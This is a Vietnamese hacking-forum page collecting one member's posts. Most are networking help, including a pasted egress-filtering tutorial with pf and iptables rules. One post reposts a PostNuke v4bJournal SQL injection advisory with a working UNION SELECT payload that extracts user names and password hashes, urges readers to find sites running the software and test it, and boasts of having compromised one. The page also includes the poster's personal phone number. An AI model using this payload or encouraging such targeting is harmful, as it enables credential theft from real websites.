banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: SonNguyen_sn  XML
Profile for SonNguyen_sn Messages posted by SonNguyen_sn [ number of posts not being displayed on this page: 0 ]
 
Theo đúng qui định của DIễn đàn.
Tôi cũng tham gia diễn đán khá lâu. (Ong_gia <~~ nick cũ)
Vừa cho ra mắt Website. Mong BQT xem xét và check dùm.

Link xác nhận:

http://cafechieu.net/xacnhan.htm

Thân ái!
Test cái fai wall này xem:

Use egress filtering to mitigate attacks and information leaks coming from your network.

By now you should be familiar with the concept of firewalling as it applies to blocking traffic coming into your network. But have you considered the benefits of filtering traffic that leaves your network? For instance, what would happen if someone compromised a host on your network and used it as a platform to attack other networks? What if a worm somehow made it onto your network and tried to infect hosts across the Internet? At the very least, you would probably receive some angry phone calls and emails.

Luckily, filtering your outbound trafficotherwise known as egress filteringcan help to contain such malicious behavior. Egress filtering not only can protect others from attacks originating from your network, but also can be used to enforce network usage policies and make sure information doesn't leak out of your network onto the wider Internet. In many situations, egress filtering is just as important as filtering inbound traffic.

The general guideline when crafting egress-filtering rules is the same as when constructing any inbound-filtering rule: devices should be allowed to do only what they were meant to do. That is, a mail server should be allowed to serve and relay mail only, a web server should be allowed to serve web content only, a DNS server should service DNS requests only, and so on. By ensuring that this policy is implemented, you can better contain the threats mentioned earlier.

It might also be a good idea to force users to use internal services rather than Internet services wherever possible. For example, if you are using your own DNS servers, clients shouldn't be able to connect to external DNS servers to resolve hostnames. If clients are allowed to do this, you risk the chance that they will reveal intranet hostnames to outside parties when they attempt to resolve internal hostnames through an external DNS server.

This restriction can be accomplished in OpenBSD with a rule like this:

rdr on $INT_IF inet proto { tcp, udp } from $INT_IF:network to any port 53
-> $DNS_SERVER port 53


Of course, you'll need to set INT_IF to the interface facing your internal network and set DNS_SERVER to the IP address of your internal DNS server.

If you're using Netfilter [Hack #44], you'll have to use four rules to accomplish the same goal:

# iptables -t nat -A PREROUTING -p tcp -i

$INT_IF

--dport 53 -j DNAT \
--to-destination

$DNS_SERVER

:53
# iptables -t nat -A PREROUTING -p udp -i

$INT_IF

--dport 53 -j DNAT \
--to-destination

$DNS_SERVER

:53
# iptables -t nat -A POSTROUTING -p tcp -o

$EXT_IF

--sport 53 -j SNAT \
--to-source

$SNAT_IP

# iptables -t nat -A POSTROUTING -p udp -o

$EXT_IF

--sport 53 -j SNAT \
--to-source

$SNAT_IP




The first two rules specify that the destination address of any incoming packet destined for TCP or UDP port 53 should be rewritten to DNS_SERVER. However, this will cause any response to the rewritten packet to be sent to the host that initiated the connection. If the server to which the host originally intended to connect is not DNS_SERVER, the response from DNS_SERVER will be silently dropped.

The next two rules fix this by performing address translation on the source address of the packet before it is sent out. That sends DNS_SERVER's response back to the host running Netfilter, and the host then translates the destination address back to the host that initiated the connection. You should set SNAT_IP to the IP address on the machine running Netfilter that is visible to DNS_SERVER.

Similarly, if you're running an internal mail server and want to monitor email that exits your enterprise, you'll need to prevent your users from sending email through external mail servers. In OpenBSD, can do this by using a similar rule to force all SMTP traffic to be wwwected to your own SMTP server:

rdr on $INT_IF inet proto tcp from $INT_IF:network to any port 25 -> $SMTP_HOST port 25


For Netfilter, the same result can be accomplished with these two rules:

# iptables -t nat -A PREROUTING -p tcp -i

$INT_IF

--dport 25 -j DNAT \
--to-destination

$SMTP_HOST

:25
# iptables -t nat -A POSTROUTING -p tcp -i

$EXT_IF

--sport 25 -j SNAT \
--to-source

$SNAT_IP




Egress filtering can also prevent IP spoofing. By filtering on your external interface at the border of your network, you can verify that packets leaving your network have source addresses that match your address space. By filtering all other traffic, you can ensure that any IP spoofing attack performed from your network or routed through it will be dropped before the packets are able to leave.
Bạn có thể dùng Netscan để scan. Rồi một số thao tác khác.
Hoặc chạy đến thằng quản lí...Nói nhỏ xin cái pass.

^^
Mấy cái ni nghe chừng nan giải lắm lắm.. Nếu mà o hàng NET thì Killl nó đi. Kill đơn giản thôi.
Kill mấy cái mà HVA đã bàn rồi. Và đã có bài post về vấn đề này rồi.
Nói chung là đừng nên chọc ngoáy.. KHổ cho mấy thằng làm Network như bọn tớ lắm.

MK!
Open port cũng phải check cẩn thận.. Rồi setup cũng fai xem...
Cũng không hiểu lỗi j luôn!
Ai có bug 2.1.7 không nhỉ.

Tớ mún test thằng này quá! Co cách nào chiến thằng này đc không nhỉ.
Mình chỉ biết về mạng, mấy cái này khó hiểu thật!
Cái này có bài viết rồi mà!
dù sao bạn cũng đã nhiệt tình thế!

he he!
Khai thác đc cũng vớ mồm...
Rút dây mạng của máy đó ra. smilie)

--------------
Đùa thế thôi! Moderm của bạn là loại j. Nếu bạn dùng DC hoặc thông qua máy chủ thì việc này đơn giản hơn so với các máy ngang hàng.

Bạn có thể cấu hình chiếc Moderm (router) của mình chặn port cho từng IP.

Have nice day!
Đơn giản thôi.
1. Máy tính đó nối mạng.
2. Open port 3389/
3 * (cái này very inportant): Bảo thằng QUản trị mạng ở đây set cho cái user remote là login vô tư.
^^
Hơ hơ!
Trong commandcom. Bạn thử ping xem thế nào.
Hoặc dùng netstart xem a răng.

Hoặc xem lại Modem có chặn cổng Web không?
CHeck lại hệ thống. Hớ hớ!
Mấy cấy ni khắc phục đơn giản thôi mà. CHịu khó chọc ngoáy nhiều vô, kiểu chi nọ được. (trước khí chọc thì làm file Ghost ...)

Thử hết các kiểu, rồi post lỗi lên đây! Rứa nha!
Bạn xem lại Workgruop
Đặt cái máy trạm cái IP tĩnh, set up thêm mấy cái TCP/IP.

LÀ nó nhận thôi.
Không quan trọng đấy là WIn j đâu! ^^

GhostRider wrote:

Cám ơn bạn!
Bạn có thể chỉ rõ cho mình hơn được không? Cách "Join các máy tính client chạy XP vào domain. Log vào bằng các account vừa tạo". 


Cái này nói ra thì dài dòng lắm.
Bạn liên hệ với tớ, tớ ném tài liệu cho:
YM: sir_sonnguyen
MobilE: 0912860809

...
Tớ nói sơ qau thế này:
Bạn cứ đặt IP tĩnh cho từng máy trạm.
Sau đó. Cài 1 DC ở Máy chủ. Sau khi cài đặt xong Domain.

Bạn phải đến từng máy trạm và join nó vào Domain. (cá i này thì hơi mệt đấy).

^^
Thiết lập từng OU.... các kiểu. Tạo user, Permission...

hé hé

Look2Me wrote:
Lý do: google kiểm tra ip của bạn, biết là của vn thì sẽ wwwect về .com.vn thôi.

Bạn Fake ip đi => sẽ vào google.com. Đây cũng là 1 cách để check xem mình fake ip thành công chưa.
Chúc thành công!
 

^^
Bác nói thế là không hẳn đúng đâu à nha!
^^
Nếu khong may tớp phải cái IP của thằng Argen, Thailand hay china. Thì vỡ mõm. Không có font mà chạy đâu à nha.

Nhớ kiếm cái IP của thằng Mẽo mà dùng.
^^

napoleon_tq wrote:


13.15M
http://www.mediafire.com/?2g2xy5xgwzn 

Đao được chết liền à!
Khi Victim tạo 1 user admin trên PC của họ thì mình giải quyết đc vấn đề j.,
Hơ hớ

minhquan1712 wrote:
Vừa check được chú này 

cái này bên milw0rm có share rồi mà
ax. cha này pót lên mà còn bỏ đi cái example của người ta nữa chứ smilie
 


Nhầm hàng rồi!
Ý tớ là Tớ vừa chiến đc 1 thằng dùng cái Post - Nuke nhờ cái bug này.
Hớ hớ.

Lần sau check lại bài tớ à nhá.
Hỉu nhầm thế lày thì bán E-Gold mà ăn cám à smilie)

smilie
Vừa check được chú này. Mọi người kiếm cái site nào sử dụng Source này. Test thử cái xem thế nào.

PostNuke Journal

----------------------------------------

DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran

Greetz For All Y! UnderGround Group Members ( www.2600.ir )

Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

Contact: abbasi (at) ustmb.ac (dot) ir [email concealed]

{SQL BUG}

in

index.php?module=v4bJournal&func=journal_comment&id=(SQL)------------------------------------------

EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/selec
t/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/n
uke_users/**/where/**/pn_uid=2/*EX:-

http://www.example.com/index.php?mod...urnal_comment&
id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,1
1,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*

U must regrister first ( You Most Have An Account On Vulnerable Site )
cái này Zazu đã chiến rồi mà!
Bạn thử cách này nhé.

Bạn vào WVista.

Đổi tên máy. Rồi làm thế này:

Change ID network.

Next ---> Next
Sau đó nhạp Domain và pass vào!
xem có đc khôg?

meomap_hp wrote:
- Mình đang gặp trục trặc trong việc cấu hình NAT Không hiểu sao khi mình gõ vào (trên máy mình) 222.252.172.14 thì browser lại đi thẳng vào modem mà ko vào webserver
 

Vì bạn dùng localhost mà. Đánh IP đó vào thẳng máy rồi.
cái thứ 2, bạn nhờ Người khác vào cái IP đấy thì không được cũng đúng thôi.

Thứ 1: IP của nhà cung cấp là IP tĩnh. Nhảy nhót loằng nhoằng, làm sao mà xách định được.

Cách đơn giản thế này nhé:
Bạn kiếm 1 cái domain (domain lởm cũng đc, nhưng phải change đc DNS - thiếu thì tớ 1 cái smilie).

Sau đó vào http://everydns.net reg 1 tài khoản.
Point cái domain của bạn vào.

Tiếp đó DNS của Domain thì change: ns1--> ns4.everydns.net

Nói về homeserver.
http://localhost/ ok Chạy rồi.

Vào Moderm. ---> NAT.

Vì bạn là Zoom X5.
Vì Add thêm cổng vào.

Hoặc kiểm tra: Advanced Setup / Miscellaneous Configuration
Chọn HTTP server access : All (<<trich bài trên)

Poit đúng cái IP tĩnh tại máy đang dùng: 10.0.0.4 và port 80.
Muốn remote thì 10.0.0.4 Port 3389.

Thế là chạy rồi. Fake IP cái. Rồi gõ domain vào IE.
Không chạy chết liền.

Không đc PM tớ: sonnguyen_sn
^^
Làm cho nó cái IP động cho dễ dùng đi.
Còn Ping không được thì bạn ping đúng tên máy chưa
VD: run--> cmd
danh hostname xem máy tên gì.
Sang máy khác ping đúng cái tên đó xem.

Hoặc ipconfig xem cái IP.

Còn chia sẻ thì bác í nói rồi.

Hoặc \\<ten may>\c$ <~~ vào ổ c của máy <ten may>. Nhớ là máy phải có pass.
Thông dụng cho W2K3
1. Về phần quản trị mạng thì có 2 cái.
Bạn muốn tìm hiểu về cái nào. LAN hay Webserver.

Nếu là Webserver thì cần nhiều thời gian
Quản trị hệ thống mạng (LAN / WAN) thì không ít thời gian để tìm hiểu đâu (nói thế cho khác cái trên).

Tài liệu khá nhiều ở http://microsoft.com
Bạn thích đọc cái j cũng có.
Hoặc
Còn 1 cách là nếu bạn dùng Gruop Polici thì việc này khá đơn giản.
Không chỉ có 1 người và cả 1 gruop và ngồi ở may DC nào cũng thế.

Thử đi!
Tìm cái Driver của máy Scan cho W2k3.
Chịu khó ngồi Search đi

Hoặc cách tốt nhất vào thẳng trang chủ của Sản phẩm. Tìm cái Driverr đi!


Rồi tìm thử, tớ nghĩ chắc là không khó đâu. Nếu không được thì bạn vào http://driverguide.com
Chúc thành công!

mountain wrote:
Các bác ơi , username và password của IP là như thế nào ạ. E ko hiểu , các bác giải thích đi 

À à!
Cái User name password của IP đây nè:
User: Internet
Pass: Protocol
:lolsmilie :lolsmilie :lolsmilie :lolsmilie :lolsmilie
 
Go to Page:  First Page Page 1

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|